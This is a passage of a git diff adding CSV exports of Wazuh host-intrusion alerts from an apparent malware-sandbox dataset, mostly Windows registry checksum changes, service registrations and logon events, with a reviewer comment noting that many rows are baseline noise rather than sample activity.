@@ -0,0 +1,22 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 31, 2020 @ 12:01:28.309",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '9cff44496a5ed58ecd06ce03fe6410f8' +New md5sum is : '4851a8fa9ed6c37f76f4ef6c0dd6d33e' +Old sha1sum was: '19ebed2ea7007c5bd2580630b03830bb0b2dee87' +New sha1sum is : '96ff488eeb3d9b9ede478b6e2d70a97d2cd5d937' +", +"May 31, 2020 @ 12:01:28.293",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '09f9a868702d8a69d4b62b6dc4365b29' +New md5sum is : 'd81f7e509f5c1a9330ce7886a815c11b' +Old sha1sum was: '4c3792c463152bc8effee78473d7f3b3c0e8e25e' +New sha1sum is : '032f00848ab7f2fe55a7b63edfa8c5598fbf5268' +", +"May 31, 2020 @ 12:01:23.934",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. 
+Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +", +"May 31, 2020 @ 12:00:03.886",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 31, 2020 @ 11:59:52.068",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 31, 2020 @ 11:57:21.267",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 5956; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\WMI : SELECT * FROM BatteryFullChargedCapacity; ResultCode = 0x80041010; PossibleCause = Unknown""",,,, diff --git a/data/MW_29_NIDS.csv b/data/MW_29_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_29_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_2_HIDS_1.csv b/data/MW_2_HIDS_1.csv new file mode 100644 index 0000000..6f4da01 --- /dev/null +++ b/data/MW_2_HIDS_1.csv 
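Review bot: Every row in this file is environment baseline rather than sample activity: the Winlogon key's old md5 `9cff44496a5ed58ecd06ce03fe6410f8` and the VolatileUserMgrKey old md5 `09f9a868702d8a69d4b62b6dc4365b29` are exactly the new values recorded in `data/MW_28_HIDS_3.csv`, so these keys drift on every run (consistent with the `AutoAdminLogon` benchmark failure also logged here), and the SessionEnv, IE FeatureControl and WMI `BatteryFullChargedCapacity` entries are likewise generic Windows noise. If per-sample HIDS verdicts are derived from these exports, a no-sample baseline run should be published and these descriptions listed as excluded noise, e.g. `Baseline noise (present in every run): "Integrity checksum changed." on HKLM\...\Winlogon and ...\VolatileUserMgrKey, "Benchmark for Windows audit: ... AutoAdminLogon ...", "SessionEnv was unavailable ...", "Multiple Windows error events"`. The benchmark row also shows the sandbox has automatic logon enabled, a lab artifact that should be disclosed in the dataset description.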
@@ -0,0 +1,292 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 4, 2020 @ 14:54:49.932",3,"Service startup type was changed", +"Apr 4, 2020 @ 14:53:40.040",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '5695135f1e3e443110a19087874cd50b' +New md5sum is : '39fa8d517b6e993129cb1768e34e286b' +Old sha1sum was: '1bb9b229f52d7794cdc2af9e0ddd088c35f0f43b' +New sha1sum is : 'd04aaebc7b10b3efc225f513253c8d8a0a4b69b2' +" +"Apr 4, 2020 @ 14:53:40.009",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'fed2b06cbd07fe85425f98eb7f3d3216' +New md5sum is : '5c846d33afca4692d83a3ab365ad6442' +Old sha1sum was: 'f940226ddc3f6eb8eb086a431f6a56b8f2b955d2' +New sha1sum is : '084d92d987ccfb645a193f074fd7a6b45d5fd358' +" +"Apr 4, 2020 @ 14:53:38.650",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System' checksum changed. +Old md5sum was: '401e534489c4201969c73e3417a991dd' +New md5sum is : 'c8ac4b841c008e3ac0a8a192544d37c5' +Old sha1sum was: 'e32cf50732d765aaecb1f3cf7b634619089e4aaa' +New sha1sum is : 'e0866d0f9ff0c9fa64a69a11948050e82fbb6b83' +" +"Apr 4, 2020 @ 14:53:37.947",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System' checksum changed. +Old md5sum was: '401e534489c4201969c73e3417a991dd' +New md5sum is : 'c8ac4b841c008e3ac0a8a192544d37c5' +Old sha1sum was: 'e32cf50732d765aaecb1f3cf7b634619089e4aaa' +New sha1sum is : 'e0866d0f9ff0c9fa64a69a11948050e82fbb6b83' +" +"Apr 4, 2020 @ 14:53:36.446",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a06c' was added. 
+" +"Apr 4, 2020 @ 14:53:36.431",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:53:27.280",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'b7ec5bb81f333ea85396b0877ce994bf' +New md5sum is : '91ea775bba23dd9cceea947be23278d7' +Old sha1sum was: '287349b3de03079e399dece2ffa8aaec1820117b' +New sha1sum is : 'e9082bc8c1dfe0b8116a7ee67589dc469a8c5010' +" +"Apr 4, 2020 @ 14:53:27.265",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '1fc4b44bbc6d9c106ac0a4752d93e35e' +New md5sum is : '1b10e1576592aeeae76e193943cd085c' +Old sha1sum was: 'd6ef55e2e093129301c899b328d315bfac96c7ee' +New sha1sum is : 'a6d019de337f5367f57b5bcd76850390daa35c1c' +" +"Apr 4, 2020 @ 14:53:26.479",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'e568d386d27113eb1ba52bfb132bb787' +New md5sum is : '57f8b6b5db75343af171f0dc0bacde47' +Old sha1sum was: 'a28c9a87bd38a849dd4a592671950344f9551692' +New sha1sum is : '157cf70bc23044f99a540eb0baef93821371fa62' +" +"Apr 4, 2020 @ 14:53:25.118",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'c24356a255f876bd6fccfcb32936aae9' +New md5sum is : '61ab47c110186181be5841f0689573b8' +Old sha1sum was: 'bbde208ff893d96d36d0af5f942c549646a33ded' +New sha1sum is : '84a0f5edd7ca01077ce40b0b34caf30a5c540757' +" +"Apr 4, 2020 @ 14:53:24.853",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'f11cbdccb5777fd847f978820b366ff8' +New md5sum is : 'c32dbb6e4a029edba187f66eac6c1771' +Old sha1sum was: '51b54373018e415c4da2fd612ecf45ba322d2873' +New sha1sum is : '1b63705b0d28aa7de76ce2d2119384141a028dda' +" +"Apr 4, 2020 @ 14:53:24.275",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:53:24.248",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:53:24.072",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: '50992766142f23c322b3c8834e7fe949' +New md5sum is : 'de248ef71f0126e55ddff7772849bfa0' +Old sha1sum was: '90ccc9868e860e19d9c2a434a79aabacf4de45c2' +New sha1sum is : 'a4cf18306b521d7187328ff01821349e7e257550' +" +"Apr 4, 2020 @ 14:53:23.837",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: 'd27458f33cbff01c47ffde09dbc053f1' +New md5sum is : '080661a6d8f55396459d821708e47f0d' +Old sha1sum was: '02a003fd0ed73b38768c7e5710bf909d35b5838a' +New sha1sum is : '4903700cc0ab8761b803864ec3e77436515ad056' +" +"Apr 4, 2020 @ 14:53:23.348",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:53:23.308",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:53:22.681",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'bfaa185ae33cb6476403d7acf06a7c9d' +New md5sum is : '61ab47c110186181be5841f0689573b8' +Old sha1sum was: 'be8c3559f5d0a63e3b035c71193591f824e4b369' +New sha1sum is : '84a0f5edd7ca01077ce40b0b34caf30a5c540757' +" +"Apr 4, 2020 @ 14:53:20.446",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: '9fc65fde0729dc43624c26720f88c410' +New md5sum is : '7bd9eb19c00055c3058e080d4f64f21b' +Old sha1sum was: '360f3fe841b4713603e18ee79890382e35160dd3' +New sha1sum is : '25ef63b1a2030e73ec882e5936b4ad7c09810c9d' +" +"Apr 4, 2020 @ 14:53:16.275",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 14:53:15.307",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '4578ec56ccbb4264af718516ba89e48b' +New md5sum is : '06e6f475b1bd4f2c80027ef9d0a66d54' +Old sha1sum was: '9b534a06cbc8893f49a0a1f5f38d9e02792565b0' +New sha1sum is : '97ffaccc0569ace218f7b51c65a680af50f328f3' +" +"Apr 4, 2020 @ 14:53:14.853",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: 'f4f4f95950e3c8f54a99c57e96ab2edb' +New md5sum is : 'aa60931ec92fca97978531f0dad7b0dd' +Old sha1sum was: 'c2a79a64bbeb6f5db068f732ac71e9fcc1893c13' +New sha1sum is : 'd4a922889d4722b5a792d685e5645b3da2e7c2d0' +" +"Apr 4, 2020 @ 14:53:14.806",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. 
+Old md5sum was: '671078222c6f28f8a987ef233af7d5a5' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: 'c62d69328b5a046dd8494e6a38df8074f8310102' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +" +"Apr 4, 2020 @ 14:53:06.463",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:53:06.446",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:53:05.900",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:53:05.868",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:53:04.196",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:53:04.165",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:53:01.290",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3f03fecf7ce5aadefb5cab6ffaa05faa' +New md5sum is : 'c66b183a17660843a68e85ab0783b570' +Old sha1sum was: '28ce914f14dd2d187d30924e93ca0a6a7385abab' +New sha1sum is : '82d2a45ff16d72f993fb907a1d9432d297767914' +" +"Apr 4, 2020 @ 14:52:59.743",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'b8c3b69a51fc59b265023c4b7e9ed57f' +New md5sum is : 'c28024f789d0e17086a88a75440b3e55' +Old sha1sum was: 'e58cfda03bb6bdc0e0ce6fa9d7730eac7402a2fb' +New sha1sum is : 'e3a8730432f63c9cb6b89edce1afa857e55a623d' +" +"Apr 4, 2020 @ 14:52:58.759",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: '044589c37bc4852348838fb502a9a0ba' +New md5sum is : '48a50efbf42edd3d3af178271fb7fad4' +Old sha1sum was: '6dba2499db8b93171cc3064fe87359b07d9df7e9' +New sha1sum is : '7d220712a8daa09739da3a946c285a3ec85329b2' +" +"Apr 4, 2020 @ 14:52:58.619",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:58.603",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a06c\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 14:52:58.587",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:54.633",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'e0a88757732adb4d0d3a7edc290ee929' +New md5sum is : 'a7421ab81e260fb95e61bbd0617b8757' +Old sha1sum was: 'd318c91983cd767243b4a3d870ac9035a5c36a5f' +New sha1sum is : 'cbfb40a8144b212f0fdfa053000bf43102638185' +" +"Apr 4, 2020 @ 14:52:53.243",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. 
+Old md5sum was: '3f03fecf7ce5aadefb5cab6ffaa05faa' +New md5sum is : 'c66b183a17660843a68e85ab0783b570' +Old sha1sum was: '28ce914f14dd2d187d30924e93ca0a6a7385abab' +New sha1sum is : '82d2a45ff16d72f993fb907a1d9432d297767914' +" +"Apr 4, 2020 @ 14:52:50.758",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'd7bd7fc504ac1841a21cde8f25341a4a' +New md5sum is : '5273eb6ce6ddc4cc85cc2038dd24bd3b' +Old sha1sum was: '4ac5259d3f2506c63bd0bb18af2f072b91c2fe73' +New sha1sum is : '73319e7c95ecb62647296057bac746d9a86b04d6' +" +"Apr 4, 2020 @ 14:52:49.993",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '3f03fecf7ce5aadefb5cab6ffaa05faa' +New md5sum is : 'c66b183a17660843a68e85ab0783b570' +Old sha1sum was: '28ce914f14dd2d187d30924e93ca0a6a7385abab' +New sha1sum is : '82d2a45ff16d72f993fb907a1d9432d297767914' +" +"Apr 4, 2020 @ 14:52:48.149",3,"Windows Logon Success", +"Apr 4, 2020 @ 14:52:40.025",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '8063f6fdc0522dd77a0610639c5056e4' +New md5sum is : '1b5a91bc3771d592416bfbadca5eaa21' +Old sha1sum was: '5ce924849d32af7b03c0706d5d5e2f7496eb461a' +New sha1sum is : '6b52b75fe3595cdaa03ca25c633d15755382428d' +" +"Apr 4, 2020 @ 14:52:33.915",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. 
+Old md5sum was: '3146f0ba92fe0170094d9d545db4b252' +New md5sum is : '1add02cca992decdd3dbfd1a3afb1b66' +Old sha1sum was: '4d2f1ef3223c6acc42b5a3b6be685daaa743a056' +New sha1sum is : 'f052b598f0d90c3e4224e33ed5e8db0774b2a3ef' +" +"Apr 4, 2020 @ 14:52:32.680",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:32.649",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:32.571",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:32.540",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:32.212",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:32.181",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:31.868",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:31.837",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:31.680",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:31.664",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a06c\Security' was added. 
+" +"Apr 4, 2020 @ 14:52:31.478",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'c24356a255f876bd6fccfcb32936aae9' +New md5sum is : '61ab47c110186181be5841f0689573b8' +Old sha1sum was: 'bbde208ff893d96d36d0af5f942c549646a33ded' +New sha1sum is : '84a0f5edd7ca01077ce40b0b34caf30a5c540757' +" +"Apr 4, 2020 @ 14:52:30.071",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:30.055",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:29.899",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:29.868",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:29.774",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:29.758",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:27.633",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:27.617",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a06c\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 14:52:27.587",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a06c\TriggerInfo\3' was added. 
+" +"Apr 4, 2020 @ 14:52:27.571",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a06c\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 14:52:27.556",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a06c\TriggerInfo\1' was added. +" +"Apr 4, 2020 @ 14:52:27.540",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a06c\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 14:52:27.508",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:26.696",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:26.681",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:26.383",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: 'ea109dad61f26278b2a007ef17c996b7' +New md5sum is : '391e6190a43f25a6d49b328e881151f2' +Old sha1sum was: '65aaeb86d6981ea8d7cb0875bc5974767c52e2e7' +New sha1sum is : 'cb89eae2ff9d767b122c251ae24344032323577c' +" +"Apr 4, 2020 @ 14:52:26.367",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: 'b9c939bb4103da27bcb085a47d9614db' +New md5sum is : '9057fba4630e09ce70521eb5fd36d298' +Old sha1sum was: '98c5954e670ce716b157d2f76bc614f20494e8cb' +New sha1sum is : '7087d6d51528c07bb2426ba2614f9da2b354198a' +" +"Apr 4, 2020 @ 14:52:26.336",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '4743bf5169df2fe349c39c2c4b10c0ec' +New md5sum is : '5202222deaf563b19616c59012a497e7' +Old sha1sum was: 'e221e2b5b3f6c85c64e2d06cd98fae818a2759cc' +New sha1sum is : 'b88fa88cf50848d8bac9d14b3d9e7fd30c205558' +" +"Apr 4, 2020 @ 14:52:22.322",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a06c' was added. +" +"Apr 4, 2020 @ 14:52:22.306",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a06c\Security' was added. +" +"Apr 4, 2020 @ 14:52:14.758",3,"Windows Logon Success", +"Apr 4, 2020 @ 14:51:28.492",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 14:51:05.835",3,"Windows Logon Success", +"Apr 4, 2020 @ 14:50:58.664",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 14:50:58.619",3,"Windows User Logoff", +"Apr 4, 2020 @ 14:50:58.603",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 14:50:58.538",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 14:50:49.677",3,"The Windows Search Service started", +"Apr 4, 2020 @ 14:50:49.397",3,"Windows Logon Success", +"Apr 4, 2020 @ 14:50:49.366",3,"Windows Logon Success", +"Apr 4, 2020 @ 14:50:49.231",3,"The database engine attached a database", +"Apr 4, 2020 @ 14:50:49.123",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 14:50:47.551",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 14:50:47.344",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 14:50:46.447",7,"SessionEnv was unavailable to handle a critical 
notification event",
+"Apr 4, 2020 @ 14:50:46.131",3,"Windows Logon Success",
+"Apr 4, 2020 @ 14:50:45.539",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'."
+"Apr 4, 2020 @ 14:50:01.640",5,"SessionEnv was unavailable to handle a notification event",
+"Apr 4, 2020 @ 14:50:01.613",5,"WSearch was unavailable to handle a notification event",
+"Apr 4, 2020 @ 14:49:38.267",3,"Windows Logon Success",
+"Apr 4, 2020 @ 14:49:34.034",3,"Service startup type was changed",
+"Apr 4, 2020 @ 14:49:24.674",3,"Software Protection service scheduled successfully",
+"Apr 4, 2020 @ 14:48:17.329",3,"The database engine attached a database",
+"Apr 4, 2020 @ 14:48:17.232",3,"The database engine has completed recovery steps",
+"Apr 4, 2020 @ 14:48:17.178",3,"The database engine is replaying log file C:\Winnt\system32\wins\j50.log",
+"Apr 4, 2020 @ 14:48:17.138",3,"The database engine is initiating recovery steps",
+"Apr 4, 2020 @ 14:48:17.122",3,"The database engine is starting a new instance",
+"Apr 4, 2020 @ 14:47:31.008",4,"Summary event of the report's signatures",
+"Apr 4, 2020 @ 14:47:27.446",3,"Windows Logon Success",
+"Apr 4, 2020 @ 14:47:26.586",9,"Windows Application error event",
diff --git a/data/MW_2_HIDS_2.csv b/data/MW_2_HIDS_2.csv
new file mode 100644
index 0000000..582d31a
--- /dev/null
+++ b/data/MW_2_HIDS_2.csv
@@ -0,0 +1,1873 @@
+timestamp,"rule.level","rule.description","full_log","data.win.system.message"
+"Apr 24, 2020 @ 12:42:32.738",5,"The VSS service is shutting down due to idle timeout",,"""The VSS service is shutting down due to idle timeout. """
+"Apr 24, 2020 @ 12:42:31.064",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T12:32:28Z. Reason: RulesEngine."""
+"Apr 24, 2020 @ 12:41:45.658",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start."""
+"Apr 24, 2020 @ 12:41:45.644",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from auto start to demand start."""
+"Apr 24, 2020 @ 12:41:10.392",3,"Windows Logon Success",,"""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x24c
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. 
